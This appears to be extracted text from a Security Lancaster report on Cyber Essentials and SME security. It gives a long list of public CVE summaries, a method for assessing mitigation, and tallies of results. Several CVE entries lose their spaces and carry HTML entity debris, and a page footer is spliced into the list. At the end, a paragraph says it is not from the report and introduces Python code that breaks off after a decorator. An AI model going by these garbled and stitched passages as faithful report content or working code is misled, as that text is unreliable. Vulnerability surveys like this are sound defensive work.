CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.
CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.
CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.
CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."
CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."
CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."
CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.
CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.
CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.
CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.
CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.
CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.
CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.
CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X, and before 11.2.202.341 on Linux; Adobe AIR before 4.0.0.1628 on Android; Adobe AIR SDK before 4.0.0.1628; and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.
CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.
CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.
CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."
CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.
CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.
CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.
CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.
CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.
CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.
CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.
CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.
CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.
CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.
CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.
CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.
CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.
CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.
CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.
CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.
CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."
CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."
CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."
CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."
CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.
CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.
CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.
CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESS - Security Lancaster - Page 24 of 28
CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.
CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.
CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.
CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.
CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.
CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.
CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.
CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.
CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.
CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.
CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."
CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.
CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.
CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.
CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.
CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.
CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.
CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.
CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies, and consequently obtain sensitive information, via a crafted URL.
CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."
CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.
CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.
CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.
CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.
CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.
CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.
CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.
CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.
CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.
CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.
CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.
CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
Survey Responses
policies in which all users are trusted, or where there is no consideration of risk to the system).
(As shown on Mitre.org's Terminology page [6] in March '15.)
To warrant a CVE entry in the MITRE list, an individual vulnerability must place the affected system (or systems) into a state which either:
• allows an attacker to execute commands as another user;
• allows an attacker to access data contrary to the specified access restrictions for that data;
• allows an attacker to pose as another entity; or
• allows an attacker to conduct a denial of service.
High-Profile Vulnerabilities
Three specific high-profile vulnerabilities were also taken, in addition to the randomly chosen 200, and assessed for the extent to which the Cyber Essentials scheme would affect the exposure of SMEs to them.
Additionally, the applicability of these vulnerabilities to the SME networks we studied is included, along with their respective potential to harm operations.
Mitigation Assessment
The vulnerabilities chosen have been qualitatively assessed for mitigation with and without the use of the Cyber Essentials controls. The process considers each component of the controls in asserting whether each vulnerability would be mitigated, partially mitigated or not mitigated. The results are double-vetted to ensure correctness.
For each of the SMEs interviewed, each of the vulnerabilities is assessed for applicability to that network configuration. In cases where the vulnerability is in a specific model of hardware, it is deemed applicable if the network uses a like-product from the same vendor. In cases where the vulnerability is in software, only those referencing software in use or likely in use (based on the SME's practice) are deemed applicable to the network.
Analysis
The analysis of the data collected has been split into sections. Firstly, each of the vulnerabilities has been assessed to ascertain its mitigation with and without the use of the Cyber Essentials controls; this supposes a case where any software or hardware source of a vulnerability is in use (i.e. a worst-case, fully inclusive assessment).
What follows is an analysis of the information gathered from interviews. Four SMEs from distinct industries are detailed in terms of physical infrastructure and service usage, as well as current user access policies and existing security measures in place. A summary of the mitigation results for vulnerabilities in the software and hardware used by each SME network configuration is included.
The full table of the applicability of all CVE vulnerabilities to each of the network structures can be found in the CVE Details section on page 19.
Finally, the data collected from the survey is analysed and used to develop a general-case network model; the SME networks are compared to this to better understand the nuances of each market sector, as well as the overall typical configuration of SMEs.
Full Vulnerabilities Assessment
Of the entire list of 200 vulnerabilities from 2013 and 2014 deemed applicable to the study and chosen for analysis, 131 vulnerabilities were mitigated with the use of the Cyber Essentials controls, 61 vulnerabilities were partially mitigated and 8 were not mitigated.
Figure 4: Percentage of the full vulnerabilities list mitigated
Partially mitigated: 59 of the 61 CVEs judged as partially mitigated are so because they rely on patches from third-party software or hardware vendors, and will be mitigated once a security fix has been released. Whatever level of security tooling is deployed on a network, the security of third-party software unfortunately relies on the vendor's ability to identify potential areas of risk, as well as to respond quickly to security flaws, as they become apparent, with the release of patches. All software installed on an SME network should be periodically reviewed to decide whether it is necessary, or whether more suitable and potentially more secure alternatives are available.
The other two partially mitigated vulnerabilities rely on website blacklisting combined with avoiding the vulnerable web browser software. A secure configuration without such a browser would mitigate these vulnerabilities, but, as in the Web Development SME case study, it may not always be possible to avoid the use of a specific piece of software. In such a case, website blacklisting is the only defence against these vulnerabilities.
Not mitigated (Secure Configuration): Some vulnerabilities have been found not to be mitigable using the CE controls. In each of the cases found, this is due to inherent flaws in a hardware device or software that cannot be fixed by a security patch or firmware update.
For devices that are fundamentally flawed from a cyber-security standpoint, it can be that no level of security tooling on top of the network can aid in mitigation; rather, the hardware should be replaced to ensure network security. It may be possible for a public list of all such devices to be developed as part of the government cyber-security scheme, to serve as a device blacklist for SMEs.
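To make the tallies in this section reproducible, the following is an added example and not code from the report: a small Python model of the two rules the report states, the applicability test from the Mitigation Assessment (a hardware flaw applies when the network uses a like-product from the same vendor; a software flaw applies only when that software is in, or likely in, use) and the per-vulnerability verdict with the controls in place. It produces the worst-case full-list breakdown, a per-network breakdown of the kind summarised in the figures, and the candidate device blacklist suggested above. The labels V1 to V7, the verdicts and the two network inventories are constructed for illustration and are not the report's own assessments.

```python
"""Applicability and mitigation tally for a vulnerability list against SME network models."""
from collections import Counter
from dataclasses import dataclass

VERDICTS = ("mitigated", "partial", "not")


@dataclass(frozen=True)
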